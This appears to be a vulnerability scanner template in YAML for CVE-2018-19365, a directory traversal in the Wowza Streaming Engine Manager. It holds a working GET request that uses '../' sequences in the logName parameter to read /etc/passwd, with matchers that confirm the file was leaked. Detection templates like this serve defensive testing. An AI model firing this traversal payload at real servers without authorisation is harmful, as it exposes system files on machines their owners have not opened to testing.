32 lines
1003 B
YAML
32 lines
1003 B
YAML
id: CVE-2018-19365
|
|
info:
|
|
name: Wowza Streaming Engine Manager Directory Traversal
|
|
author: 0x_Akoko
|
|
severity: high
|
|
description: The REST API in Wowza Streaming Engine 4.7.4.01 allows traversal of the directory structure and retrieval of a file via a remote, specifically crafted HTTP request
|
|
reference:
|
|
- https://blog.gdssecurity.com/labs/2019/2/11/wowza-streaming-engine-manager-directory-traversal-and-local.html
|
|
- https://www.cvedetails.com/cve/CVE-2018-19365
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
cvss-score: 7.5
|
|
cve-id: CVE-2018-19365
|
|
cwe-id: CWE-22
|
|
tags: cve,cve2018,wowza,lfi
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/enginemanager/server/logs/download?logType=error&logName=../../../../../../../../etc/passwd&logSource=engine"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: regex
|
|
part: body
|
|
regex:
|
|
- "root:.*:0:0:"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|